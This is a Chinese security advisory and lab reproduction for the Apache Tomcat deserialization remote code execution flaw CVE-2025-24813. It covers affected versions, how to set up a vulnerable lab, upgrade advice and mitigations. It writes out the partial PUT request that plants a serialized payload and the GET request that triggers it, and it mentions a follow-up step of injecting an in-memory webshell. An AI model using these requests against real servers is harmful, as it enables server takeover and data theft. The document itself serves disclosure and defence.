关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警

admin
admin
admin
138858
文章
114
评论
2025年4月16日22:33:09评论20 views字数 2081阅读6分56秒阅读模式

近期,国家信息安全漏洞库(CNNVD)收到关于 Apache Tomcat 安全漏洞CVE-2025-24813情况的报送。此漏洞可使未授权的攻击者远程执行恶意代码,危害极大。为保障各单位网络安全,现发布该漏洞预警信息,请各单位高度重视,及时做好安全防护工作。

一、漏洞概述

Apache Tomcat 是美国阿帕奇(Apache)基金会一款广泛使用的轻量级 Web 应用服务器,主要用于实现对 Servlet 和 JavaServer Page(JSP)的支持。此次漏洞的产生源于 Apache Tomcat 反序列化机制未对用户输入进行严格验证,导致攻击者能够通过构造恶意序列化对象绕过安全限制,进而实现远程恶意代码的执行,最终获取服务器的控制权。

二、危害影响

受此漏洞影响的 Apache Tomcat 版本包括 11.0.0-M1 至 11.0.2 版本、10.1.0-M1 至 10.1.34 版本以及 9.0.0.M1 至 9.0.98 版本。一旦漏洞被成功利用,攻击者可执行任意代码,实现对服务器的完全控制。这将导致服务器上的数据面临被窃取、篡改或删除的风险,严重影响业务的正常运行,甚至可能导致企业敏感信息泄露,造成不可估量的损失。

三、漏洞利用条件

当应用程序同时满足以下条件时,攻击者可利用该漏洞:

  1. 启用 Servlet 写入功能:应用程序启用了 DefaultServlet 写入功能,而该功能在默认情况下是关闭的。

  2. 支持 partial PUT 请求:应用支持 partial PUT 请求,此功能默认开启,攻击者可通过该请求将恶意的序列化数据写入到会话文件中。

  3. 使用 Tomcat 的文件会话持久化:应用使用了 Tomcat 的文件会话持久化机制,并且使用了默认的会话存储位置。

  4. 包含存在反序列化漏洞的库:应用中包含一个存在反序列化漏洞的库,如类路径下的 commons - collections 等,此条件取决于业务实现是否依赖存在反序列化利用链的库。

此外,当上传文件目标 URL 为公共目标 URL 的子目录,且攻击者知悉上传文件名称时,未经身份验证的攻击者可获取目标文件信息或添加文件内容。

四、环境安装

1、环境安装:https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.97/bin/

2、配置更改:

(1)context.xml添加以下内容

<ManagerclassName="org.apache.catalina.session.PersistentManager">  <StoreclassName="org.apache.catalina.session.FileStore"/>  </Manager>  
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警

(2)web.xml将DefaultServlet的readonly配置为false

<init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警

(3)将Commons Collections 3.2.1.jar放入webappsROOTWEB-INFlib文件夹

下载链接:https://mvnrepository.com/artifact/commons-collections/commons-collections/3.2.1
3、启动环境
startup.bat

五、漏洞复现

1、使用Java-Chains工具生成payload

下载链接:https://github.com/vulhub/java-chains/blob/main/README.zh-cn.md
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警
2、使用yakit进行发包,注:Content-Length数值要大于等于实际数值
PUT /hywl/session HTTP/1.1Host192.168.58.134:8080Content-Length2086  Content-Rangebytes 0-2086/2200{{base64dec(反序列化内容)}}
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警

3、会在ROOT中生成session文件

关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警

4、稍等几秒会自动触发

或者直接执行以下命令手动触发(如未执行成功,请查看是否有权限)

GET / HTTP/1.1Host192.168.58.134:8080Cookie: JSESSIONID=.hywl
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警

5、进一步扩大漏洞危害,植入内存马,选择Gadget注入内存马。

关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警

六、修复建议

目前,Apache 官方已发布新版本修复了该漏洞,建议各用户及时确认所使用的产品版本,并尽快采取修补措施,将 Apache Tomcat 升级至安全版本,具体如下:

  • Apache Tomcat 11.0.3 或更高版本;

  • Apache Tomcat 10.1.35 或更高版本;

  • Apache Tomcat 9.0.99 或更高版本。

如因特殊原因无法立即进行升级,可参考以下临时缓解措施:

1、禁用ѕеrvlеt写入功能(rеаdоnlу=true)

关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警
关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警

原文始发于微信公众号(网络威胁数据联盟):关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月16日22:33:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的安全预警https://cn-sec.com/archives/3965264.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息